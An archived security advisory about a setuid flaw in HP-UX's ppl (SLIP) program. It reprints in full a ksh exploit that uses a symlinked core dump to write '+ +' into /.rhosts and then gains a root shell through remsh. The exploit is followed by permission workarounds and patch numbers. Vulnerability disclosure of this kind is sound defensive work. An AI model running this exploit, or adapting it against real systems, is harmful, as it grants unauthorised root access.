COMMAND

    /usr/bin/ppl (/bin/ppl)

SYSTEMS AFFECTED

    HpUX 9.x, 10.x

PROBLEM

    The  ppl  application  is  HP's  version of SLIP, a Point-To-Point
    Serial Linking  protocol  for  TCP/IP.    Now, if you remember  HP
    told us  to apply  patch because  SoD people  (Scriptors of  Doom)
    made exploit.   Patch PHNE_9771 was  for all platforms  with HP-UX
    releases 10.20.  That's what HP gave us.  SoD people gave us again
    an exploit and this  time for this bloody  patch.  Here comes  the
    original exploit.


        #!/bin/ksh
        # SoD exploit the PHSS_9771 ppl patch (among others)
        # 2/13/97 - Honey is Bee Tea
        # Did I or did I not say "could probably make a link bug out of this"
        # in the previous exploit script for ppl?  Did you even bother to read it?
        cd /tmp
        rm core 2>/dev/null
        ln -s /.rhosts core
        perl -e '$file="A"x2500; exec {"/usr/bin/ppl"} "$file","\n+ +\n";'
        rm core
        remsh localhost -l root "echo + + > /.rhosts"
        remsh localhost -l root ksh -i

SOLUTION

    Temporally solution is to remove setuid and execute permissions:

        # chmod 400 /usr/bin/ppl
        # ls -l /usr/bin/ppl
        -r--------   1 root bin        98304 Jan 24 08:13 /usr/bin/ppl

    If  you  wish  to  restrict  ppl  access,  you can perform that by
    creating some "trusted"  group which will  contain trusted set  of
    users:

        # chgrp trusted /usr/bin/ppl
        # chmod 4550 /usr/bin/ppl
        # ls -l /usr/bin/ppl
        -r-sr-x---   1 root trusted    98304 Jan 24 08:13 /usr/bin/ppl

    The best solution would be to apply patch:

        PHNE_13179 for all platforms with HP-UX releases 9.X,
        PHNE_13180 for all platforms with HP-UX releases 10.00 & 10.01,
        PHNE_13181 for all platforms with HP-UX release 10.10,
        PHNE_13182 for all platforms with HP-UX release 10.20,
        PHNE_12499 for all platforms with HP-UX release 10.30.